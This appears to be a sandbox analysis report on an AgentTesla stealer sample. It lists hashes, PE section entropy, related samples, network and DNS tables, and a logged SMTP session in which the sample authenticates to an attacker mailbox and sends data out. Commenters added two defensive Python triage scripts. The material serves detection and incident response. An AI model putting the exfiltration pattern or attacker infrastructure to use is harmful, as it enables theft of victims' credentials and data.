PUBLIC-DOMAIN-REGISTRYUS | TT Invoice copy.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.91.198.143
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | Credit_Details21367163050417024.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | SAMPLE PURCHASE ORDER.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | Eaton PO-45150292964.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | 45brrQrxwH.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | Quotation 0048484.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | remittance payment of invoice DMWW24009.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | 2llKbb9pR7.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | NOA, BL and invoice.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | Hays_compiled_documents.ZIP.js | Get hash | malicious | Unknown | Browse | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | MdeeRbWvqe.exe | Get hash | malicious | LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader | Browse | 104.26.13.205
                                                          No context
                                                          Process:C:\Users\user\Desktop\Cleared Payment.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.938263954989257
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:Cleared Payment.exe
                                                          File size:767'488 bytes
                                                          MD5:0df9817e2867f94e6bf0c066f9d88013
                                                          SHA1:9b45f5c8cf5402b8cd56b58df316ca84b633f5c2
                                                          SHA256:ff70339ef950407a12f181c63d5b3d59fe40198237d97ce3c6537403c7863624
                                                          SHA512:f14ad10b0378351739effc439c3967f0bf41ccca9a45f3ad438582a03a806bd44945b858c68ad35283d39787be4bc078ed5939005f38af9dec0b32dd3ab9806e
                                                          SSDEEP:12288:qJiNBSErx60+7FKlMglO7kMSd1CjKaXJt9Fh5bvo8nkLtU45M1z:+iNwErJuoMSOGk750FtHO
                                                          TLSH:03F42340316A9F33CA7F07F9683C25F00B766569F671EB8D5CC950EA15A8F810762E8B
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.................. ... ....@.. ....................... ............`................................
                                                          Icon Hash:8b2f2f93b3a38178
                                                          Entrypoint:0x4b099e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x661C9380 [Mon Apr 15 02:40:00 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          inc edi
                                                          aaa
                                                          cmp byte ptr [edi], dh
                                                          inc edi
                                                          pop edx
                                                          dec edx
                                                          xor eax, 31554837h
                                                          push ecx
                                                          inc edx
                                                          xor byte ptr [eax], bh
                                                          inc ebp
                                                          xor eax, 004A5135h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb094c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0xc61c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xae9bc | 0xaea00 | 3bd6d02d6ac7a451583a02f90b5ad40b | False | 0.9491684189334287 | data | 7.942915720013936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb2000 | 0xc61c | 0xc800 | 26a6e0193406d4ede9d8b10ea00f780b | False | 0.96587890625 | data | 7.903145479577397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc0000 | 0xc | 0x200 | 2a1229488b535f79469e9ff838e665f1 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Both .text and .rsrc sit just under the 8.0 entropy ceiling for byte data and have a ZLIB complexity above 0.94 (they barely compress), which is what an encrypted or compressed payload carried inside the assembly looks like statically; this lines up with the ".NET source code contains very large array initializations" and "potential unpacker" signatures. Only the 12-byte .reloc section looks like ordinary data.
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb2100 | 0xbfb9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9901998736782054
RT_GROUP_ICON | 0xbe0cc | 0x14 | data | | | 1.1
RT_VERSION | 0xbe0f0 | 0x32c | data | | | 0.44704433497536944
RT_MANIFEST | 0xbe42c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain

The only native import is the CLR entry stub mscoree.dll!_CorExeMain; together with the populated IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header at 0x2008) this identifies the file as a managed (.NET) executable, so the "Programmed in" field in the process entries below should be read as .NET.
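Added example (my code, not the report's or Joe Sandbox's) that reproduces the static checks behind the tables above: it parses the section headers and the data directory of a PE, computes per-section Shannon entropy, and reports whether the CLR header directory (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR) is populated. Because it has to run offline, build_sample_pe() constructs a small PE32 with the same .text/.rsrc/.reloc layout; its contents, the SHA-256 filler and the 7.0 entropy threshold are assumptions for illustration, not the sample's bytes.

```python
"""Static PE triage: section entropy plus the CLR-header check.

Added example, not part of the Joe Sandbox report.  Only the header fields
needed for the report's section table and its COM_DESCRIPTOR row are parsed.
The image built by build_sample_pe() is constructed for this example."""
import hashlib
import math
import struct
from collections import Counter

PACKED_ENTROPY_THRESHOLD = 7.0  # heuristic cut-off for packed/encrypted data (assumption)
DIR_COM_DESCRIPTOR = 14         # index of IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Return {'is_dotnet': bool, 'sections': [...]} from raw file bytes."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_opt = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)      # DataDirectory offset: PE32 vs PE32+
    com_va, com_size = struct.unpack_from("<II", image, dir_base + 8 * DIR_COM_DESCRIPTOR)

    sections = []
    table = opt + size_opt                                # section headers follow the optional header
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, hdr + 8)
        characteristics = struct.unpack_from("<I", image, hdr + 36)[0]
        data = image[raw_ptr:raw_ptr + raw_size]
        entropy = shannon_entropy(data)
        sections.append({
            "name": name, "va": va, "vsize": vsize, "raw_size": raw_size,
            "md5": hashlib.md5(data).hexdigest(),
            "entropy": round(entropy, 3),
            "executable": bool(characteristics & IMAGE_SCN_MEM_EXECUTE),
            "packed": entropy >= PACKED_ENTROPY_THRESHOLD,
        })
    return {"is_dotnet": com_va != 0 and com_size != 0, "sections": sections}


def _filler(n: int) -> bytes:
    """Deterministic high-entropy bytes (SHA-256 in counter mode) standing in
    for an encrypted payload; constructed, not taken from the sample."""
    out = bytearray()
    for i in range((n + 31) // 32):
        out += hashlib.sha256(i.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed PE32 with the report's three-section layout (.text/.rsrc/.reloc)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew -> PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x102)  # i386, 3 sections, PE32 opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<II", opt, 96 + 8 * DIR_COM_DESCRIPTOR, 0x2008, 0x48)  # CLR header present
    bodies = [(b".text", 0x2000, 0x60000020, _filler(0x2000)),
              (b".rsrc", 0xB2000, 0x40000040, _filler(0x800)),
              (b".reloc", 0xC0000, 0x42000040, b"\0" * 0x200)]
    headers, raw, ptr = b"", b"", 0x200                    # raw data starts at file offset 0x200
    for name, va, chars, body in bodies:
        headers += struct.pack("<8sIIIIIIHHI", name, len(body), va, len(body), ptr, 0, 0, 0, 0, chars)
        raw += body
        ptr += len(body)
    head = dos + b"PE\0\0" + coff + bytes(opt) + headers
    return head + b"\0" * (0x200 - len(head)) + raw


if __name__ == "__main__":
    report = parse_pe(build_sample_pe())
    print("CLR header present:", report["is_dotnet"])
    for s in report["sections"]:
        print(f"{s['name']:<7} va=0x{s['va']:x} raw=0x{s['raw_size']:x} "
              f"entropy={s['entropy']:.3f} packed={s['packed']} exec={s['executable']}")
```

Run against a real file with parse_pe(open(path, "rb").read()): a managed executable with a near-8.0 .text entropy and a single mscoree import, as in this report, is the pattern to send straight to a .NET unpacker rather than a native disassembler.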
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/17/24-08:35:59.697606 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 17, 2024 08:35:56.703314066 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:56.703349113 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:56.703494072 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:56.710272074 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:56.710284948 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:56.935055017 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:56.935157061 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:56.939341068 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:56.939352036 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:56.940751076 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:56.983894110 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:57.010900021 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:57.056111097 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:57.229729891 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:57.229908943 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:57.229970932 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:57.236388922 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:58.210551023 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:58.364218950 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:58.364543915 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:58.706649065 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:58.706886053 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:58.860425949 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:58.860692024 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:58.865853071 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.022391081 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.027379036 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.186510086 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.188256979 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.344630003 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.345020056 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.539174080 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.541800022 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.541960001 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.695760965 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.696962118 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.697606087 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.697606087 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.697606087 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.697662115 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:59.851125002 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.851264000 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.987848997 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:36:00.030514002 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:37:38.014286995 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:37:38.169331074 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:37:38.169358969 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:37:38.169420004 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:37:38.169471979 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:37:38.322999954 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 17, 2024 08:35:56.592880011 CEST | 65185 | 53 | 192.168.2.6 | 1.1.1.1
Apr 17, 2024 08:35:56.697422981 CEST | 53 | 65185 | 1.1.1.1 | 192.168.2.6
Apr 17, 2024 08:35:57.996125937 CEST | 61233 | 53 | 192.168.2.6 | 1.1.1.1
Apr 17, 2024 08:35:58.208534002 CEST | 53 | 61233 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 17, 2024 08:35:56.592880011 CEST | 192.168.2.6 | 1.1.1.1 | 0x56a1 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:57.996125937 CEST | 192.168.2.6 | 1.1.1.1 | 0x700d | Standard query (0) | smtp.italiacanda-it.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 17, 2024 08:35:56.697422981 CEST | 1.1.1.1 | 192.168.2.6 | 0x56a1 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:56.697422981 CEST | 1.1.1.1 | 192.168.2.6 | 0x56a1 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:56.697422981 CEST | 1.1.1.1 | 192.168.2.6 | 0x56a1 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:58.208534002 CEST | 1.1.1.1 | 192.168.2.6 | 0x700d | No error (0) | smtp.italiacanda-it.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 17, 2024 08:35:58.208534002 CEST | 1.1.1.1 | 192.168.2.6 | 0x700d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.223 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:58.208534002 CEST | 1.1.1.1 | 192.168.2.6 | 0x700d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.225 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:58.208534002 CEST | 1.1.1.1 | 192.168.2.6 | 0x700d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.224 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:35:58.208534002 CEST | 1.1.1.1 | 192.168.2.6 | 0x700d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.143 | A (IP address) | IN (0x0001) | false
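To turn the packet and DNS tables above into something a responder can read at a glance, here is an added example (my code, not part of the report) that groups packet rows into connections, times each connection, counts packets per direction, and maps the server address back to the name that was resolved for it. SAMPLE_ROWS is a constructed subset of the report's rows (the first and last packets of each connection) written one field per column; DNS_ANSWERS is copied from the answer table; treating the endpoint with the lower port as the server is an assumption.

```python
"""Flow summary from the report's packet rows (added example, not from the report)."""
from datetime import datetime

# Constructed subset of the report's rows: timestamp | src port | dst port | src ip | dst ip
SAMPLE_ROWS = """\
Apr 17, 2024 08:35:56.703314066 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:56.703349113 CEST | 443 | 49712 | 104.26.13.205 | 192.168.2.6
Apr 17, 2024 08:35:57.236388922 CEST | 49712 | 443 | 192.168.2.6 | 104.26.13.205
Apr 17, 2024 08:35:58.210551023 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:35:58.364218950 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
Apr 17, 2024 08:35:59.697606087 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223
Apr 17, 2024 08:37:38.322999954 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6
"""

# From the report's DNS answer table (address -> queried name)
DNS_ANSWERS = {"104.26.13.205": "api.ipify.org", "208.91.199.223": "smtp.italiacanda-it.com"}
SERVICES = {25: "smtp", 465: "smtps", 587: "submission", 443: "https", 80: "http", 53: "dns"}
MAIL_PORTS = {25, 465, 587}


def parse_row(row: str):
    """Split one row; the zone label is dropped and the fraction cut to microseconds."""
    ts, sport, dport, sip, dip = [f.strip() for f in row.split("|")]
    stamp, _zone = ts.rsplit(" ", 1)
    date, clock = stamp.rsplit(" ", 1)
    secs, frac = clock.split(".")
    when = datetime.strptime(f"{date} {secs}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return when, int(sport), int(dport), sip, dip


def summarize_flows(table: str, dns=DNS_ANSWERS) -> list:
    """Group rows into client/server connections, ordered by first packet seen."""
    flows = {}
    for row in table.strip().splitlines():
        when, sport, dport, sip, dip = parse_row(row)
        # lower port = server side (assumption; holds for ephemeral client ports)
        if dport < sport:
            key, to_server = (sip, sport, dip, dport), True
        else:
            key, to_server = (dip, dport, sip, sport), False
        f = flows.setdefault(key, {"first": when, "last": when, "to_server": 0, "to_client": 0})
        f["first"], f["last"] = min(f["first"], when), max(f["last"], when)
        f["to_server" if to_server else "to_client"] += 1
    out = []
    for (cip, cport, sip, sport), f in flows.items():
        out.append({
            "client": f"{cip}:{cport}", "server": f"{sip}:{sport}",
            "server_name": dns.get(sip), "service": SERVICES.get(sport, "other"),
            "first": f["first"], "last": f["last"],
            "duration_s": round((f["last"] - f["first"]).total_seconds(), 3),
            "pkts_to_server": f["to_server"], "pkts_to_client": f["to_client"],
            "mail_exfil_candidate": sport in MAIL_PORTS,
        })
    return sorted(out, key=lambda x: x["first"])


if __name__ == "__main__":
    for fl in summarize_flows(SAMPLE_ROWS):
        print(f"{fl['client']} -> {fl['server']} ({fl['server_name']}, {fl['service']}) "
              f"{fl['duration_s']}s  c->s={fl['pkts_to_server']} s->c={fl['pkts_to_client']} "
              f"mail={fl['mail_exfil_candidate']}")
```

On the full table the two connections are the short HTTPS round trip to api.ipify.org and a submission (587) connection that stays open for roughly 100 seconds after the message is queued, until the QUIT at 08:37:38; the address-to-name join is what lets the 208.91.199.223 flow be tied back to the smtp.italiacanda-it.com lookup.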
                                                          • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49712 | 104.26.13.205 | 443 | 2548 | C:\Users\user\Desktop\Cleared Payment.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-17 06:35:57 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-17 06:35:57 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Apr 2024 06:35:57 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 875a65e20b0153ab-ATL
2024-04-17 06:35:57 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
Data Ascii: 81.181.57.52

The 12-byte body is the public address the sandbox egresses from as seen by api.ipify.org, which is the "May check the online IP address of the machine" signature; the request is made with a fixed Firefox 99 User-Agent rather than a browser.


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 17, 2024 08:35:58.706649065 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 17, 2024 08:35:58.706886053 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | EHLO 494126
Apr 17, 2024 08:35:58.860692024 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
Apr 17, 2024 08:35:58.865853071 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | AUTH login c25wc3NAaXRhbGlhY2FuZGEtaXQuY29t
Apr 17, 2024 08:35:59.022391081 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Apr 17, 2024 08:35:59.186510086 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 235 2.7.0 Authentication successful
Apr 17, 2024 08:35:59.188256979 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | MAIL FROM:<snpss@italiacanda-it.com>
Apr 17, 2024 08:35:59.344630003 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 250 2.1.0 Ok
Apr 17, 2024 08:35:59.345020056 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | RCPT TO:<snpss@italiacanda-it.com>
Apr 17, 2024 08:35:59.541800022 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 250 2.1.5 Ok
Apr 17, 2024 08:35:59.541960001 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | DATA
Apr 17, 2024 08:35:59.696962118 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 354 End data with <CR><LF>.<CR><LF>
Apr 17, 2024 08:35:59.697662115 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | .
Apr 17, 2024 08:35:59.987848997 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 250 2.0.0 Ok: queued as 7291A5006F0
Apr 17, 2024 08:37:38.014286995 CEST | 49714 | 587 | 192.168.2.6 | 208.91.199.223 | QUIT
Apr 17, 2024 08:37:38.169331074 CEST | 587 | 49714 | 208.91.199.223 | 192.168.2.6 | 221 2.0.0 Bye

